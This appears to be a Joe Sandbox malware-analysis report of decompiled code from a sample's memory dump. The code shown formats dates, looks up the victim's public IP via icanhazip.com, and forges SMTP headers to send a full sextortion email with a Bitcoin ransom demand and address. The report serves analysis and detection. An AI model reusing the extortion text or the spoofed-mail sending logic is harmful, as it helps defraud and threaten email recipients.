                                                                                                                                                                                                                                                                  				_v12 = 0x9031a4;
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					FileTimeToLocalFileTime(_a4,  &_v292);
                                                                                                                                                                                                                                                                  					FileTimeToSystemTime( &_v292,  &_v108);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					GetLocalTime( &_v108); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v284.Bias = 0;
                                                                                                                                                                                                                                                                  				_t105 = GetTimeZoneInformation( &_v284); // executed
                                                                                                                                                                                                                                                                  				_v8 = _t105;
                                                                                                                                                                                                                                                                  				_v92 = _v284.Bias;
                                                                                                                                                                                                                                                                  				if(_v8 == 2) {
                                                                                                                                                                                                                                                                  					_t145 = _v92 + _v284.DaylightBias;
                                                                                                                                                                                                                                                                  					_t170 = _t145;
                                                                                                                                                                                                                                                                  					_v92 = _t145;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v92 =  ~_v92;
                                                                                                                                                                                                                                                                  				if(_t170 < 0) {
                                                                                                                                                                                                                                                                  					_v296 =  ~_v92;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v296 = _v92;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v88 = _v296;
                                                                                                                                                                                                                                                                  				if((_v108.wDayOfWeek & 0x0000ffff) > 6) {
                                                                                                                                                                                                                                                                  					_v108.wDayOfWeek = 6;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if((_v108.wMonth & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                  					_v108.wMonth = 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if((_v108.wMonth & 0x0000ffff) > 0xc) {
                                                                                                                                                                                                                                                                  					_v108.wMonth = 0xc;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_a12 == 0) {
                                                                                                                                                                                                                                                                  					if(_v92 < 0) {
                                                                                                                                                                                                                                                                  						_v304 = "-";
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v304 = "+";
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t164 + (_v108.wDayOfWeek & 0x0000ffff) * 4 - 0x50)), _v108.wDay & 0x0000ffff,  *((intOrPtr*)(_t164 + (_v108.wMonth & 0x0000ffff) * 4 - 0x38)), _v108.wYear & 0x0000ffff, _v108.wHour & 0x0000ffff, _v108.wMinute & 0x0000ffff, _v108.wSecond & 0x0000ffff, _v304, _v88 / 0x3c, _v88 % 0x3c);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(_v92 < 0) {
                                                                                                                                                                                                                                                                  						_v300 = 0x9031ac;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v300 = 0x9031a8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					return wsprintfA(_a8, "%u %s %u %.2u:%.2u:%.2u %s%.2u%.2u", _v108.wDay & 0x0000ffff,  *((intOrPtr*)(_t164 + (_v108.wMonth & 0x0000ffff) * 4 - 0x38)), _v108.wYear & 0x0000ffff, _v108.wHour & 0x0000ffff, _v108.wMinute & 0x0000ffff, _v108.wSecond & 0x0000ffff, _v300, _v88 / 0x3c, _v88 % 0x3c);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}



































                                                                                                                                                                                                                                                                  0x00901499
                                                                                                                                                                                                                                                                  0x009014a0
                                                                                                                                                                                                                                                                  0x009014a7
                                                                                                                                                                                                                                                                  0x009014ae
                                                                                                                                                                                                                                                                  0x009014b5
                                                                                                                                                                                                                                                                  0x009014bc
                                                                                                                                                                                                                                                                  0x009014c3
                                                                                                                                                                                                                                                                  0x009014ca
                                                                                                                                                                                                                                                                  0x009014d1
                                                                                                                                                                                                                                                                  0x009014d8
                                                                                                                                                                                                                                                                  0x009014df
                                                                                                                                                                                                                                                                  0x009014e6
                                                                                                                                                                                                                                                                  0x009014ed
                                                                                                                                                                                                                                                                  0x009014f4
                                                                                                                                                                                                                                                                  0x009014fb
                                                                                                                                                                                                                                                                  0x00901502
                                                                                                                                                                                                                                                                  0x00901509
                                                                                                                                                                                                                                                                  0x00901510
                                                                                                                                                                                                                                                                  0x00901517
                                                                                                                                                                                                                                                                  0x00901522
                                                                                                                                                                                                                                                                  0x0090153b
                                                                                                                                                                                                                                                                  0x0090154c
                                                                                                                                                                                                                                                                  0x00901524
                                                                                                                                                                                                                                                                  0x00901528
                                                                                                                                                                                                                                                                  0x00901528
                                                                                                                                                                                                                                                                  0x00901552
                                                                                                                                                                                                                                                                  0x00901563
                                                                                                                                                                                                                                                                  0x00901569
                                                                                                                                                                                                                                                                  0x00901572
                                                                                                                                                                                                                                                                  0x00901579
                                                                                                                                                                                                                                                                  0x0090157e
                                                                                                                                                                                                                                                                  0x0090157e
                                                                                                                                                                                                                                                                  0x00901581
                                                                                                                                                                                                                                                                  0x00901581
                                                                                                                                                                                                                                                                  0x00901589
                                                                                                                                                                                                                                                                  0x0090158c
                                                                                                                                                                                                                                                                  0x0090159e
                                                                                                                                                                                                                                                                  0x0090158e
                                                                                                                                                                                                                                                                  0x00901591
                                                                                                                                                                                                                                                                  0x00901591
                                                                                                                                                                                                                                                                  0x009015aa
                                                                                                                                                                                                                                                                  0x009015b4
                                                                                                                                                                                                                                                                  0x009015bb
                                                                                                                                                                                                                                                                  0x009015bb
                                                                                                                                                                                                                                                                  0x009015c5
                                                                                                                                                                                                                                                                  0x009015cc
                                                                                                                                                                                                                                                                  0x009015cc
                                                                                                                                                                                                                                                                  0x009015d7
                                                                                                                                                                                                                                                                  0x009015de
                                                                                                                                                                                                                                                                  0x009015de
                                                                                                                                                                                                                                                                  0x009015e6
                                                                                                                                                                                                                                                                  0x0090165d
                                                                                                                                                                                                                                                                  0x0090166b
                                                                                                                                                                                                                                                                  0x0090165f
                                                                                                                                                                                                                                                                  0x0090165f
                                                                                                                                                                                                                                                                  0x0090165f
                                                                                                                                                                                                                                                                  0x00901678
                                                                                                                                                                                                                                                                  0x00901684
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x009015e8
                                                                                                                                                                                                                                                                  0x009015ec
                                                                                                                                                                                                                                                                  0x009015fa
                                                                                                                                                                                                                                                                  0x009015ee
                                                                                                                                                                                                                                                                  0x009015ee
                                                                                                                                                                                                                                                                  0x009015ee
                                                                                                                                                                                                                                                                  0x00901607
                                                                                                                                                                                                                                                                  0x00901613
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901654

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocalTime.KERNELBASE(?), ref: 00901528
                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 0090153B
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0090154C
                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(00000000), ref: 00901563
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0090164E
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 009016C8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$File$Localwsprintf$InformationSystemZone
                                                                                                                                                                                                                                                                  • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$%u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                                                                                                                                                                                                  • API String ID: 1439763326-1766317088
                                                                                                                                                                                                                                                                  • Opcode ID: c9906ce3a571d5133f44808ad9cc3bc5b5f5d9da5d44414194ecec37016982f8
                                                                                                                                                                                                                                                                  • Instruction ID: 8c517d05c86520e1d39ba640074c189823718ab9ab5a7eb4a509c0a6a9aa3e6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9906ce3a571d5133f44808ad9cc3bc5b5f5d9da5d44414194ecec37016982f8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E961D7B0904318DFCB64CFC5CC48AEEBBF9AF8D705F108149E506AB294D7789A84DB64
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E009017D0() {
                                                                                                                                                                                                                                                                  				void _v108;
                                                                                                                                                                                                                                                                  				long _v112;
                                                                                                                                                                                                                                                                  				void* _v116;
                                                                                                                                                                                                                                                                  				void* _v120;
                                                                                                                                                                                                                                                                  				void* _t15;
                                                                                                                                                                                                                                                                  				void* _t21;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t15 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v120 = _t15;
                                                                                                                                                                                                                                                                  				if(_v120 == 0) {
                                                                                                                                                                                                                                                                  					wsprintfA("[84.17.52.51]", "[0.0.0.0]");
                                                                                                                                                                                                                                                                  					L8:
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v120);
                                                                                                                                                                                                                                                                  					return "[84.17.52.51]";
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t21 = InternetOpenUrlA(_v120, "http://icanhazip.com/", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v116 = _t21;
                                                                                                                                                                                                                                                                  				if(_v116 != 0) {
                                                                                                                                                                                                                                                                  					InternetReadFile(_v116,  &_v108, 0x63,  &_v112); // executed
                                                                                                                                                                                                                                                                  					if( &_v108 != 0) {
                                                                                                                                                                                                                                                                  						if(E009018B0( &_v108, ".") == 0) {
                                                                                                                                                                                                                                                                  							wsprintfA("[84.17.52.51]", "[0.0.0.0]");
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							E00901400( &_v108);
                                                                                                                                                                                                                                                                  							wsprintfA("[84.17.52.51]", "[%s]",  &_v108);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InternetCloseHandle(_v116); // executed
                                                                                                                                                                                                                                                                  				goto L8;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x009017e3
                                                                                                                                                                                                                                                                  0x009017e9
                                                                                                                                                                                                                                                                  0x009017f0
                                                                                                                                                                                                                                                                  0x00901894
                                                                                                                                                                                                                                                                  0x0090189d
                                                                                                                                                                                                                                                                  0x009018a1
                                                                                                                                                                                                                                                                  0x009018af
                                                                                                                                                                                                                                                                  0x009018af
                                                                                                                                                                                                                                                                  0x00901807
                                                                                                                                                                                                                                                                  0x0090180d
                                                                                                                                                                                                                                                                  0x00901814
                                                                                                                                                                                                                                                                  0x00901824
                                                                                                                                                                                                                                                                  0x0090182f
                                                                                                                                                                                                                                                                  0x00901844
                                                                                                                                                                                                                                                                  0x00901875
                                                                                                                                                                                                                                                                  0x00901846
                                                                                                                                                                                                                                                                  0x0090184a
                                                                                                                                                                                                                                                                  0x00901860
                                                                                                                                                                                                                                                                  0x00901866
                                                                                                                                                                                                                                                                  0x00901844
                                                                                                                                                                                                                                                                  0x0090182f
                                                                                                                                                                                                                                                                  0x00901882
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009017E3
                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00901807
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000063,?), ref: 00901824
                                                                                                                                                                                                                                                                    • Part of subcall function 009018B0: strstr.MSVCRT ref: 009018BB
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901860
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901875
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00901882
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901894
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 009018A1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$wsprintf$CloseHandleOpen$FileReadstrstr
                                                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36$[%s]$[0.0.0.0]$[0.0.0.0]$[84.17.52.51]$http://icanhazip.com/
                                                                                                                                                                                                                                                                  • API String ID: 2936383407-3567084778
                                                                                                                                                                                                                                                                  • Opcode ID: 7572cb8cef29ea4d59204048e502dbde3454b73fd546d25cab89f0fd5dfff10d
                                                                                                                                                                                                                                                                  • Instruction ID: f465d859d343d7d5ae3b84ff3723d3665d8d69d81d218b6e4d56318001075d23
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7572cb8cef29ea4d59204048e502dbde3454b73fd546d25cab89f0fd5dfff10d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB218B71A40308AFDB10EBE5DC4AF9DB77CAB44B09F20C128BA05B71C1E6B1A714DB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E00901CAB(void* __eflags) {
                                                                                                                                                                                                                                                                  				signed int _t161;
                                                                                                                                                                                                                                                                  				signed int _t163;
                                                                                                                                                                                                                                                                  				signed int _t165;
                                                                                                                                                                                                                                                                  				signed int _t167;
                                                                                                                                                                                                                                                                  				void* _t173;
                                                                                                                                                                                                                                                                  				void* _t174;
                                                                                                                                                                                                                                                                  				void* _t179;
                                                                                                                                                                                                                                                                  				void* _t183;
                                                                                                                                                                                                                                                                  				void* _t186;
                                                                                                                                                                                                                                                                  				void* _t190;
                                                                                                                                                                                                                                                                  				void* _t193;
                                                                                                                                                                                                                                                                  				void* _t195;
                                                                                                                                                                                                                                                                  				void* _t200;
                                                                                                                                                                                                                                                                  				void* _t201;
                                                                                                                                                                                                                                                                  				void* _t202;
                                                                                                                                                                                                                                                                  				void* _t223;
                                                                                                                                                                                                                                                                  				intOrPtr _t227;
                                                                                                                                                                                                                                                                  				void* _t228;
                                                                                                                                                                                                                                                                  				void* _t302;
                                                                                                                                                                                                                                                                  				void* _t304;
                                                                                                                                                                                                                                                                  				void* _t311;
                                                                                                                                                                                                                                                                  				void* _t315;
                                                                                                                                                                                                                                                                  				void* _t317;
                                                                                                                                                                                                                                                                  				void* _t319;
                                                                                                                                                                                                                                                                  				void* _t321;
                                                                                                                                                                                                                                                                  				void* _t323;
                                                                                                                                                                                                                                                                  				void* _t327;
                                                                                                                                                                                                                                                                  				void* _t328;
                                                                                                                                                                                                                                                                  				void* _t329;
                                                                                                                                                                                                                                                                  				void* _t345;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					wsprintfA(_t302 - 0x508, "%s.com", E00901320(_t302 - 0x61c, 5, _t302 - 0x61c));
                                                                                                                                                                                                                                                                  					E00901490(0, _t302 - 0x710, 1); // executed
                                                                                                                                                                                                                                                                  					Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  					E00901490(0, _t302 - 0x690, 0); // executed
                                                                                                                                                                                                                                                                  					_t161 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t163 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t165 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t167 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t302 - 0x714)) = wsprintfA(_t302 - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", E00901390(0xd2, 7, _t302 - 0x6a8), _t167 % 0xd2 + 1, _t165 % 0xfe + 1, _t163 % 0xfe + 1, _t161 % 0xfe + 1, _t302 - 0x508, _t302 - 0x690);
                                                                                                                                                                                                                                                                  					_t173 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *((intOrPtr*)(_t302 - 0x714))); // executed
                                                                                                                                                                                                                                                                  					_t311 = _t304 + 0x64;
                                                                                                                                                                                                                                                                  					if(_t173 != 0) {
                                                                                                                                                                                                                                                                  						_t174 = E00901320(_t302 - 0x710, 3, _t302 - 0x628);
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t302 - 0x714)) = wsprintfA(_t302 - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", E00901320(_t302 - 0x710, 5, _t302 - 0x69c), _t174, _t302 - 0x710);
                                                                                                                                                                                                                                                                  						_t179 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *((intOrPtr*)(_t302 - 0x714))); // executed
                                                                                                                                                                                                                                                                  						_t315 = _t311 + 0x30;
                                                                                                                                                                                                                                                                  						if(_t179 != 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t302 - 0x714)) = wsprintfA(_t302 - 0x490, "From: %s\r\n",  *((intOrPtr*)(_t302 + 8)));
                                                                                                                                                                                                                                                                  							_t183 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *((intOrPtr*)(_t302 - 0x714))); // executed
                                                                                                                                                                                                                                                                  							_t317 = _t315 + 0x18;
                                                                                                                                                                                                                                                                  							if(_t183 != 0) {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t302 - 0x714)) = wsprintfA(_t302 - 0x490, "To: %s\r\n",  *((intOrPtr*)(_t302 + 8)));
                                                                                                                                                                                                                                                                  								_t186 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *((intOrPtr*)(_t302 - 0x714)));
                                                                                                                                                                                                                                                                  								_t319 = _t317 + 0x18;
                                                                                                                                                                                                                                                                  								if(_t186 != 0) {
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t302 - 0x714)) = wsprintfA(_t302 - 0x490, "Subject: %s\r\n", "READ OR GO TO JAIL!");
                                                                                                                                                                                                                                                                  									_t190 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *((intOrPtr*)(_t302 - 0x714)));
                                                                                                                                                                                                                                                                  									_t321 = _t319 + 0x18;
                                                                                                                                                                                                                                                                  									if(_t190 != 0) {
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)(_t302 - 0x714)) = wsprintfA(_t302 - 0x490, "Date: %s\r\n", _t302 - 0x690);
                                                                                                                                                                                                                                                                  										_t193 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *((intOrPtr*)(_t302 - 0x714)));
                                                                                                                                                                                                                                                                  										_t323 = _t321 + 0x18;
                                                                                                                                                                                                                                                                  										if(_t193 != 0) {
                                                                                                                                                                                                                                                                  											_t195 = E00901320(_t302 - 0x628, 6, _t302 - 0x628);
                                                                                                                                                                                                                                                                  											 *((intOrPtr*)(_t302 - 0x714)) = wsprintfA(_t302 - 0x490, "Message-ID: <%s.%s@%s>\r\n", E00901320(_t302 - 0x628, 6, _t302 - 0x69c), _t195, _t302 - 0x508);
                                                                                                                                                                                                                                                                  											_t200 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *((intOrPtr*)(_t302 - 0x714)));
                                                                                                                                                                                                                                                                  											_t327 = _t323 + 0x30;
                                                                                                                                                                                                                                                                  											if(_t200 != 0) {
                                                                                                                                                                                                                                                                  												_t201 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), "Mime-Version: 1.0\r\n", 0xffffffff);
                                                                                                                                                                                                                                                                  												_t328 = _t327 + 0xc;
                                                                                                                                                                                                                                                                  												if(_t201 != 0) {
                                                                                                                                                                                                                                                                  													_t202 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), "Content-type: text/plain;\r\n\r\n", 0xffffffff);
                                                                                                                                                                                                                                                                  													_t329 = _t328 + 0xc;
                                                                                                                                                                                                                                                                  													if(_t202 != 0) {
                                                                                                                                                                                                                                                                  														memset(_t302 - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                  														strcpy(_t302 - 0x610, "Hi, I keep the whole story short.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "Your device got infected with my private trojan, it gave me access to all your files, accounts and contacts.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "Check the sender of this email, I sent it from your email account.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "I stole all your data and then I removed my trojan again, to not leave any traces.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "I KNOW EXACTLY ABOUT YOUR ILLEGAL ACTIVITIES!\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "It won\'t take a long time to send your data with the proof of your activities to the police.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "If you want to avoid jail time, send 1400$ in Bitcoin (BTC) to my address.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "You can easily buy Bitcoin (BTC), just Google: \"Where to buy Bitcoin (BTC)?\".\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "My address is: bc1qfzlmekudmjnhj88yjl8277zkzu6v9c2r890fan\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "Yes, that\'s how the address looks like, just copy and paste it, the address is (CaSe-SenSitiVE).\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "You are given not more than 4 days after you have opened this email.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "Once I get the payment, I will remove everything, be sure, I keep my promises.\r\n\r\n");
                                                                                                                                                                                                                                                                  														strcat(_t302 - 0x610, "Next time keep your device updated with the newest security patches.\r\n.\r\n");
                                                                                                                                                                                                                                                                  														_t223 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x610, 0xffffffff);
                                                                                                                                                                                                                                                                  														_t329 = _t329 + 0x80;
                                                                                                                                                                                                                                                                  														if(_t223 != 0) {
                                                                                                                                                                                                                                                                  															 *(_t302 - 0x20) = 7;
                                                                                                                                                                                                                                                                  														} else {
                                                                                                                                                                                                                                                                  															 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  													} else {
                                                                                                                                                                                                                                                                  														 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L46:
                                                                                                                                                                                                                                                                  					while( *(_t302 - 0x20) != 0 &&  *(_t302 - 0x20) != 8) {
                                                                                                                                                                                                                                                                  						_t227 = E00901160( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                  						_t345 = _t329 + 0xc;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t302 - 0x90)) = _t227;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t302 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                  							L5:
                                                                                                                                                                                                                                                                  							 *((char*)(_t302 +  *((intOrPtr*)(_t302 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                  							_t228 = E009011C0(_t302 - 0x490);
                                                                                                                                                                                                                                                                  							_t329 = _t345 + 4;
                                                                                                                                                                                                                                                                  							if(_t228 != 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *(_t302 - 0x718) =  *(_t302 - 0x20);
                                                                                                                                                                                                                                                                  								 *(_t302 - 0x718) =  *(_t302 - 0x718) - 1;
                                                                                                                                                                                                                                                                  								if( *(_t302 - 0x718) > 6) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								L8:
                                                                                                                                                                                                                                                                  								switch( *((intOrPtr*)( *(_t302 - 0x718) * 4 +  &M00902188))) {
                                                                                                                                                                                                                                                                  									case 0:
                                                                                                                                                                                                                                                                  										L9:
                                                                                                                                                                                                                                                                  										_push("ESMTP");
                                                                                                                                                                                                                                                                  										if(StrStrA(_t302 - 0x490) == 0) {
                                                                                                                                                                                                                                                                  											_t232 = wsprintfA(_t302 - 0x490, "HELO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t346 = _t329 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t302 - 0x494) = _t232;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											_t235 = wsprintfA(_t302 - 0x490, "EHLO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t346 = _t329 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t302 - 0x494) = _t235;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t234 = E00901120( *((intOrPtr*)(_t302 - 0x1c)), _t302 - 0x490,  *(_t302 - 0x494)); // executed
